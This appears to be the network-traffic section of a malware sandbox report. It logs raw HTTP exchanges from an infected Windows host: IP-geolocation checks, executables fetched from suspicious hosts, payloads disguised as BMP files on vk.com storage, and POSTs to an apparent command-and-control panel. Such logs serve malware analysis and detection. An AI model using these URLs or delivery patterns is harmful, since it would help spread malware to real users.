Network Analysis

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: api.myip.com

HTTP/1.1 200 OK Date: Tue, 04 Jul 2023 02:06:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B4qEPBF0VqjqQx2fgWslcBVf%2BEsR8BOu2yXer8v%2BU1DxOVYEufOtt2N738%2BZdXpcYjO6zdnq9Viu1EOUKC8aphVQL6dy7vOvtp88VLLVFJ6PzHr%2BSmi8OmIVYzgboQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7e13cf860889835e-KIX

GET /doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: kittenx Date: Tue, 04 Jul 2023 02:06:48 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 234353 Connection: keep-alive X-Powered-By: KPHP/7.4.114061 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixlang=17; expires=Mon, 01 Jul 2024 11:01:59 GMT; path=/; domain=.vk.com Set-Cookie: remixstlid=9053888348594348290_zXqSLYy19ms1t1AVZ3LKyH7BlmtoRxvS708GRNbiryT; expires=Wed, 03 Jul 2024 02:06:48 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixlgck=fe1b75529a0e7cffcc; expires=Sun, 07 Jul 2024 21:01:23 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstid=2119624346_yX92oZkOsUaxw2CZ2zAyl71I8xgfAU4sZZqnilqzIbD; expires=Wed, 26 Jun 2024 09:40:27 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /294/setup294.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: traffic-to.site Cache-Control: no-cache

HTTP/1.1 200 OK Date: Tue, 04 Jul 2023 02:06:53 GMT Content-Type: application/octet-stream Content-Length: 1699940 Connection: keep-alive Last-Modified: Tue, 04 Jul 2023 01:47:32 GMT ETag: "64a37a34-19f064" Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 Accept-Ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3DlQx8DtJgug7D5Zrexe3Y7hC7nTpghZLL3GAD0cJG0fENXXsqPhV2UxnYaNQ6MuIB1gXByuVJu1fY7%2FVbZsCXVfXN2gB1r8jFkMfROuQtwur3u0lPc9JNmTAtstjDN8eIM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7e13cfbbba461a0d-KIX alt-svc: h3=":443"; ma=86400

GET /doc808950829_663496587?hash=9HBIzrbBWHKqUnGhHt30dMcZIm1RpmRRZBzZ89JCfGw&dl=JRIT3v6zzNFrou8UYI02dSfdibpUzCLo9YvFXREFvCT&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9053888348594348290_zXqSLYy19ms1t1AVZ3LKyH7BlmtoRxvS708GRNbiryT; remixlgck=fe1b75529a0e7cffcc; remixstid=2119624346_yX92oZkOsUaxw2CZ2zAyl71I8xgfAU4sZZqnilqzIbD

HTTP/1.1 302 Found Server: kittenx Date: Tue, 04 Jul 2023 02:06:58 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114061 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-20.userapi.com/c909228/u808950829/docs/d39/44e1f5793080/PMmp.bmp?extra=Z1r9oittoDfhiJ4OcYscFihyLdo44Yji7Xs_I3mUIZWuCfOWtNcTOccvpUtUCzvyju5K8UH8Puj8jHq26H3oPHzUvwyZJ89D69QVwWsj-HDqatEErOgxwiRb6RiYTuRfRhpAie_4w1WtpXYgeQ X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909228/u808950829/docs/d39/44e1f5793080/PMmp.bmp?extra=Z1r9oittoDfhiJ4OcYscFihyLdo44Yji7Xs_I3mUIZWuCfOWtNcTOccvpUtUCzvyju5K8UH8Puj8jHq26H3oPHzUvwyZJ89D69QVwWsj-HDqatEErOgxwiRb6RiYTuRfRhpAie_4w1WtpXYgeQ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-20.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Tue, 04 Jul 2023 02:06:59 GMT Content-Type: image/x-ms-bmp Content-Length: 6771716 Connection: keep-alive Last-Modified: Wed, 28 Jun 2023 10:02:40 GMT ETag: "649c0540-675404" Expires: Thu, 03 Aug 2023 02:06:59 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Timing-Allow-Origin: * Accept-Ranges: bytes

GET /doc808950829_663371568?hash=nCbeQhSdektZCklmCq7XtG48Ee60nv8DORi9fErSJWH&dl=TYjpYtrURbaoeiox6ukI3zcdJlSPMzTTZwoXzpHEm48&api=1&no_preview=1#rise_test HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9053888348594348290_zXqSLYy19ms1t1AVZ3LKyH7BlmtoRxvS708GRNbiryT; remixlgck=fe1b75529a0e7cffcc; remixstid=2119624346_yX92oZkOsUaxw2CZ2zAyl71I8xgfAU4sZZqnilqzIbD

HTTP/1.1 200 OK Server: kittenx Date: Tue, 04 Jul 2023 02:06:59 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 234310 Connection: keep-alive X-Powered-By: KPHP/7.4.114061 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#stats HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9053888348594348290_zXqSLYy19ms1t1AVZ3LKyH7BlmtoRxvS708GRNbiryT; remixlgck=fe1b75529a0e7cffcc; remixstid=2119624346_yX92oZkOsUaxw2CZ2zAyl71I8xgfAU4sZZqnilqzIbD; remixir=1

HTTP/1.1 200 OK Server: kittenx Date: Tue, 04 Jul 2023 02:06:59 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 234369 Connection: keep-alive X-Powered-By: KPHP/7.4.114061 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc808950829_663648937?hash=eKai4FYeayZCAEjqzlxZ2gWz79KxiwUMuktQ4fZ6rr0&dl=8PltKcE2IQ6oZHvv1IHsdh8qZWM237x2z5umRu20Q5L&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9053888348594348290_zXqSLYy19ms1t1AVZ3LKyH7BlmtoRxvS708GRNbiryT; remixlgck=fe1b75529a0e7cffcc; remixstid=2119624346_yX92oZkOsUaxw2CZ2zAyl71I8xgfAU4sZZqnilqzIbD

HTTP/1.1 302 Found Server: kittenx Date: Tue, 04 Jul 2023 02:07:02 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114061 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-21.userapi.com/c909618/u808950829/docs/d11/42869e7f9cc3/3kqwpj3h.bmp?extra=iu5bVjMFNIqUemb79KZZ24CeL5cMX_YUphspjbrsKQ0QUE_HJGYYUnXWE5KNEfFj7ZsXJieTmQRDLqmGmAGJaPTY6e85eIHkBVaoNrbdjuIl31OOfC0u5WF-jtr_iluF_uWpnxURNYekfLRxxw X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909618/u808950829/docs/d11/42869e7f9cc3/3kqwpj3h.bmp?extra=iu5bVjMFNIqUemb79KZZ24CeL5cMX_YUphspjbrsKQ0QUE_HJGYYUnXWE5KNEfFj7ZsXJieTmQRDLqmGmAGJaPTY6e85eIHkBVaoNrbdjuIl31OOfC0u5WF-jtr_iluF_uWpnxURNYekfLRxxw HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-21.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Tue, 04 Jul 2023 02:07:03 GMT Content-Type: image/x-ms-bmp Content-Length: 1369092 Connection: keep-alive Last-Modified: Sat, 01 Jul 2023 10:57:51 GMT ETag: "64a006af-14e404" Expires: Thu, 03 Aug 2023 02:07:03 GMT Cache-Control: max-age=2592000 X-Frontend: front6-21 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Timing-Allow-Origin: * Accept-Ranges: bytes

GET /doc808950829_663416193?hash=TwgmTA3pMX5XUbfBEPazmzdRVPdFw9t8BbYBqJvidU8&dl=H6DzAmaBeDTytHVbTKfRExM88kxUqIpLizX7g2YgUEL&api=1&no_preview=1#WW1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9053888348594348290_zXqSLYy19ms1t1AVZ3LKyH7BlmtoRxvS708GRNbiryT; remixlgck=fe1b75529a0e7cffcc; remixstid=2119624346_yX92oZkOsUaxw2CZ2zAyl71I8xgfAU4sZZqnilqzIbD

HTTP/1.1 200 OK Server: kittenx Date: Tue, 04 Jul 2023 02:07:04 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 234295 Connection: keep-alive X-Powered-By: KPHP/7.4.114061 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc808950829_663757713?hash=MV1SXyDS4uzEVWhEqhhdzBKaHhSpB1pMWajJ3kWBQV8&dl=e0Oyc6MBznNTvzhob66JHCdZRBEsNzCGWPgvdgUA1Ww&api=1&no_preview=1#cryp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9053888348594348290_zXqSLYy19ms1t1AVZ3LKyH7BlmtoRxvS708GRNbiryT; remixlgck=fe1b75529a0e7cffcc; remixstid=2119624346_yX92oZkOsUaxw2CZ2zAyl71I8xgfAU4sZZqnilqzIbD; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Tue, 04 Jul 2023 02:07:05 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114061 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-21.userapi.com/c237331/u808950829/docs/d48/d1d91a4b21f4/crypted.bmp?extra=D_BWRC57Taws3-Fgtz0Gxn3f2opCiSMWtqiuFxYQA0aksgwVh6YjjIPNW5MpGk6yKGdNg8ZTX6CvpZzfgkwz7tiur4dQ3bAKw7tDCF4jRNZWimRJ_LVkrc_IZPmptHVkvrJVfSKHI0ooAQ2gRw X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c237331/u808950829/docs/d48/d1d91a4b21f4/crypted.bmp?extra=D_BWRC57Taws3-Fgtz0Gxn3f2opCiSMWtqiuFxYQA0aksgwVh6YjjIPNW5MpGk6yKGdNg8ZTX6CvpZzfgkwz7tiur4dQ3bAKw7tDCF4jRNZWimRJ_LVkrc_IZPmptHVkvrJVfSKHI0ooAQ2gRw HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-21.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Tue, 04 Jul 2023 02:07:06 GMT Content-Type: image/x-ms-bmp Content-Length: 1080836 Connection: keep-alive Last-Modified: Mon, 03 Jul 2023 17:22:30 GMT ETag: "64a303d6-107e04" Expires: Thu, 03 Aug 2023 02:07:06 GMT Cache-Control: max-age=2592000 X-Frontend: front6-21 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Timing-Allow-Origin: * Accept-Ranges: bytes

GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#test HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9053888348594348290_zXqSLYy19ms1t1AVZ3LKyH7BlmtoRxvS708GRNbiryT; remixlgck=fe1b75529a0e7cffcc; remixstid=2119624346_yX92oZkOsUaxw2CZ2zAyl71I8xgfAU4sZZqnilqzIbD; remixir=1

HTTP/1.1 200 OK Server: kittenx Date: Tue, 04 Jul 2023 02:07:06 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 234367 Connection: keep-alive X-Powered-By: KPHP/7.4.114061 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Tue, 04 Jul 2023 02:07:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Cache-control: max-age=28800 X-IPLB-Request-ID: 8D655678:9860_93878F2E:0050_64A36E8E_1B44D24A:2467C X-IPLB-Instance: 30783 CF-Cache-Status: HIT Age: 4188 Last-Modified: Tue, 04 Jul 2023 00:57:50 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=toRSpQbvWvtWS8yPB9NIu%2FpstpyU7X6GISzsqnWAREn3BhJSs5cew%2FJ%2BT8jveLGW9AZWZJO6SJ2n9%2BIzZGniD6oyZ%2BOWgTLA9YzZ0fmHQ9Oy%2BMVwM3AjRBbxxA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7e13d0db3f5819c2-KIX alt-svc: h3=":443"; ma=86400

POST /v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self HTTP/1.1 Connection: Keep-Alive Referer: https://db-ip.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 0 Host: api.db-ip.com

HTTP/1.1 200 OK Date: Tue, 04 Jul 2023 02:07:39 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Access-Control-Allow-Origin: http*://*db-ip.com Cache-control: max-age=180 X-IPLB-Request-ID: 8D655641:D568_93878F2E:0050_64A37EEB_1B4835D8:24679 X-IPLB-Instance: 30783 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3oHOTsN1DgH2AHF4pMvgHDAvpk5hJ5fajZVtP12vyT9Hqx3s1wRsAJ3%2FNyW1AAp4ExDWWpepHYiWlfLSB0iVozpzEjkz9j0mK6Vzig7nSy5DJ4yt0knjqASwQR8IqtM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7e13d0dd5b521a20-KIX alt-svc: h3=":443"; ma=86400

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 85.208.136.10

HTTP/1.1 200 OK Date: Tue, 04 Jul 2023 02:06:43 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 85.208.136.10

HTTP/1.1 200 OK Date: Tue, 04 Jul 2023 02:06:44 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 85.208.136.10

HTTP/1.1 200 OK Date: Tue, 04 Jul 2023 02:06:51 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 4184 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /g.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.66.230.164 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK etag: "60200-64a37d22-60e81;;;" last-modified: Tue, 04 Jul 2023 02:00:02 GMT content-type: application/x-executable content-length: 393728 accept-ranges: bytes date: Tue, 04 Jul 2023 02:06:52 GMT server: LiteSpeed connection: Keep-Alive

HEAD /gallery/photo270.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 77.91.124.31 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Content-Length: 831816 Content-Type: application/octet-stream Last-Modified: Tue, 04 Jul 2023 10:03:04 GMT Accept-Ranges: bytes ETag: "4a7b80b95eaed91:0" Server: Microsoft-IIS/10.0 Date: Tue, 04 Jul 2023 10:06:52 GMT

HEAD /m/okka25.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: zzz.fhauiehgha.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 04 Jul 2023 02:06:52 GMT Content-Type: application/octet-stream Content-Length: 250880 Last-Modified: Sun, 02 Jul 2023 23:27:12 GMT Connection: keep-alive ETag: "64a207d0-3d400" Accept-Ranges: bytes

GET /m/okka25.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: zzz.fhauiehgha.com Cache-Control: no-cache

